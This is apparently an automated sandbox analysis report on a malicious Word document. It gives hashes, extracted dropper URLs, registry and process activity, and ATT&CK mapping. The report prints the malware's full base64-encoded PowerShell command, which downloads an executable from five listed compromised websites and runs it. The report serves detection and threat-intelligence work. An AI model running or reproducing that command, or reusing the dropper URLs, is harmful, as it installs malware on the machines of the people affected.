5d7bd5ab1f0ef9fe49f97b49fc955f64a9878fc341650143d572b24126f1284b

General

Target

Rech1075478616DEMai232019.doc
Size

125KB
MD5

659f175cbd422379fe3a6a63c5b1f640
SHA1

61af3732c39c9ec9e6b0bd1234eba2ccfe8a42e6
SHA256

5d7bd5ab1f0ef9fe49f97b49fc955f64a9878fc341650143d572b24126f1284b
SHA512

bfe05e59cce39f8747a0ee1186a4a4f6d8834882972bf238f0dcd6743314871df4cb11e824e382ed95cb29808e7e0d75d6ab6d3aec69532d7865171a5e50aa87
SSDEEP

3072:S77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q/tr0mXSSBgfy1:S77HUUUUUUUUUUUUUUUUUUUT52V8r0mj

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://atlanticsg.com/wp-includes/fsfrz22_mkp29qlby-69478/

exe.dropper

http://eastpennlandscape.com/css/qhJUtdBFvM/

exe.dropper

http://mcs-interiors.co.uk/cgi-bin/MUbadZUIXD/

exe.dropper

http://laderajabugo.navicu.com/wp-admin/6ohv5j_6m40d-4652183/

exe.dropper

http://banphongresort.com/wp-includes/8hxbg02o_wkpvf-27459009/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1560	1784	powershell.exe

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

4 1560 powershell.exe
6 1560 powershell.exe
8 1560 powershell.exe
10 1560 powershell.exe
13 1560 powershell.exe

flow	pid	process
4	1560	powershell.exe
6	1560	powershell.exe
8	1560	powershell.exe
10	1560	powershell.exe
13	1560	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\TypeLib\{306D6C79-1A7D-4C07-BC8B-C00C048DE545}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\TypeLib\{306D6C79-1A7D-4C07-BC8B-C00C048DE545}\2.0\0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{306D6C79-1A7D-4C07-BC8B-C00C048DE545}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Wow6432Node	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\TypeLib\{306D6C79-1A7D-4C07-BC8B-C00C048DE545}\2.0\FLAGS\ = "6"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1437583205-2177757337-340526699-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1044 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1560 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1560 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

WINWORD.EXE

pid process

1044 WINWORD.EXE
1044 WINWORD.EXE
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1044 WINWORD.EXE
1044 WINWORD.EXE

pid	process
1044	WINWORD.EXE

pid	process
1560	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1560	powershell.exe

pid	process
1044	WINWORD.EXE
1044	WINWORD.EXE

pid	process
1044	WINWORD.EXE
1044	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

WINWORD.EXE

description	pid	process	target process
PID 1044 wrote to memory of 984	1044	WINWORD.EXE	splwow64.exe
PID 1044 wrote to memory of 984	1044	WINWORD.EXE	splwow64.exe
PID 1044 wrote to memory of 984	1044	WINWORD.EXE	splwow64.exe
PID 1044 wrote to memory of 984	1044	WINWORD.EXE	splwow64.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Rech1075478616DEMai232019.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1044

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy bypass -noprofile -e JABRAG4AZgB6AGoASAB3AD0AJwBGAGkAcQBMAGwAdwAnADsAJABOAGwATQBJAGQAawAgAD0AIAAnADcAMAA2ACcAOwAkAHcAcwBOAGQAMAA1AD0AJwBYAGgAUgBpAGkATwBQAGwAJwA7ACQAdQBVAEkARQBPAGYAMgB6AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAGwATQBJAGQAawArACcALgBlAHgAZQAnADsAJABaAEUAdwBCAFIAUwBPAD0AJwBuAEYAcAB6AGkAdwAnADsAJABUAHAAUwA0ADYAcwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAAbgBgAGUAdABgAC4AdwBFAGIAQwBgAGwASQBFAE4AdAA7ACQARAB3AGIAOQB6AHMAVwA9ACcAaAB0AHQAcABzADoALwAvAGEAdABsAGEAbgB0AGkAYwBzAGcALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGYAcwBmAHIAegAyADIAXwBtAGsAcAAyADkAcQBsAGIAeQAtADYAOQA0ADcAOAAvAEAAaAB0AHQAcAA6AC8ALwBlAGEAcwB0AHAAZQBuAG4AbABhAG4AZABzAGMAYQBwAGUALgBjAG8AbQAvAGMAcwBzAC8AcQBoAEoAVQB0AGQAQgBGAHYATQAvAEAAaAB0AHQAcAA6AC8ALwBtAGMAcwAtAGkAbgB0AGUAcgBpAG8AcgBzAC4AYwBvAC4AdQBrAC8AYwBnAGkALQBiAGkAbgAvAE0AVQBiAGEAZABaAFUASQBYAEQALwBAAGgAdAB0AHAAOgAvAC8AbABhAGQAZQByAGEAagBhAGIAdQBnAG8ALgBuAGEAdgBpAGMAdQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANgBvAGgAdgA1AGoAXwA2AG0ANAAwAGQALQA0ADYANQAyADEAOAAzAC8AQABoAHQAdABwADoALwAvAGIAYQBuAHAAaABvAG4AZwByAGUAcwBvAHIAdAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AOABoAHgAYgBnADAAMgBvAF8AdwBrAHAAdgBmAC0AMgA3ADQANQA5ADAAMAA5AC8AJwAuAHMAUABsAEkAdAAoACcAQAAnACkAOwAkAEIAUwAyAHAAbQA1AHQAPQAnAGgAegBuAFUAYQBsACcAOwBmAG8AcgBlAGEAYwBoACgAJABHAGkAbQA4AHoAXwBHAFIAIABpAG4AIAAkAEQAdwBiADkAegBzAFcAKQB7AHQAcgB5AHsAJABUAHAAUwA0ADYAcwAuAEQAbwBXAE4ATABPAEEAZABmAEkATABFACgAJABHAGkAbQA4AHoAXwBHAFIALAAgACQAdQBVAEkARQBPAGYAMgB6ACkAOwAkAEwAUQBYADYAYQA2AD0AJwBoAEoAcwB6AHMAdwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAHUAVQBJAEUATwBmADIAegApAC4ATABFAE4ARwB0AEgAIAAtAGcAZQAgADMAMwA2ADkAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAcwB0AEEAcgB0ACgAJAB1AFUASQBFAE8AZgAyAHoAKQA7ACQATABTAEkAMwA0AEsARgA9ACcAaABjAEgANwBWAGYAJwA7AGIAcgBlAGEAawA7ACQATwBoADUAdABtAFkAbQA9ACcAbgBBADQAaQAyAEcAYQB1ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAWQBVAEYAUwBqAD0AJwBvAEcAcwB3AE4AdQAnAA==
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
d10cb97671ebaf8f0c563d78c20e75aa

SHA1
9966598743d25df0b0491d343ff200a2640d8a56

SHA256
f59b161c36450862c620bdaa4860363dc203b94919f5229790f5d73389e9aaf6

SHA512
ee1496fe42b2ce03c2374a03cd072067d0eb25f434f5867101bbca22752dc9feb6ef7cea2610d2cb9a801b0551ee4433c333eb948f50083a271abe968b38335d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D15341E.wmf
Filesize
444B

MD5
d8983d80b7d340ea28a45380c3258478

SHA1
9d19a332dec77edcb395334c9c6802a0f4b7a8e1

SHA256
ec3fb0f0e0f921d51defcb3191f12e1f2f53c03d898af610dd5bcfab6385d1ee

SHA512
bc916d0c206cb484c172889ed41bf9a3bca2d43fc27ba34a006f33c75851886a594022c14a1fd4f3d3ad2fd23e4b74c64c72b4578b20cf4186226273cbad73a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A6395DC.wmf
Filesize
444B

MD5
81af97b745bc7f3dc0f1047a2e9db86f

SHA1
24dde9e708ed27152c455c16cc366c48d31fdc9d

SHA256
33219d85f0798e2d88812535aaa7f573fa364d9f04ea08b15c5a06ba8b4d560e

SHA512
f07ae194056463a51a84b4e07efd85c61ddbe02508399411815226340730a6cc680f5eb1d3e80519f38dbe43807e1716c8696a0d60bc1fbf7f0fb742177c237f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab48F5.tmp
Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4965.tmp
Filesize
164KB

MD5
4ff65ad929cd9a367680e0e5b1c08166

SHA1
c0af0d4396bd1f15c45f39d3b849ba444233b3a2

SHA256
c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

SHA512
f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
Filesize
20KB

MD5
d81af7a60cc640a5f5a7326cd60c8309

SHA1
bebe31212e2f854b62ab6ae402dbe5130505c75b

SHA256
56c5162f01fd7f7311162a39282ec58a042da3a18045901a91cda39dc955eff8

SHA512
53d8ad69c8c3076ff9ce8af8d36223424d95ccb06460b4e0be84a5e816166a279b09b2430a94718543fe8cf34e3c69b5b86f5ea24b106de182df14e4f3d2d166

Download Submit
memory/1044-83-0x00000000006E0000-0x00000000007E0000-memory.dmp

Filesize
1024KB

Download
memory/1044-74-0x00000000006E0000-0x00000000007E0000-memory.dmp

Filesize
1024KB

Download
memory/1044-78-0x00000000006E0000-0x00000000007E0000-memory.dmp

Filesize
1024KB

Download
memory/1044-80-0x00000000006E0000-0x00000000007E0000-memory.dmp

Filesize
1024KB

Download
memory/1044-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1044-181-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1044-65-0x00000000044E0000-0x00000000045E0000-memory.dmp

Filesize
1024KB
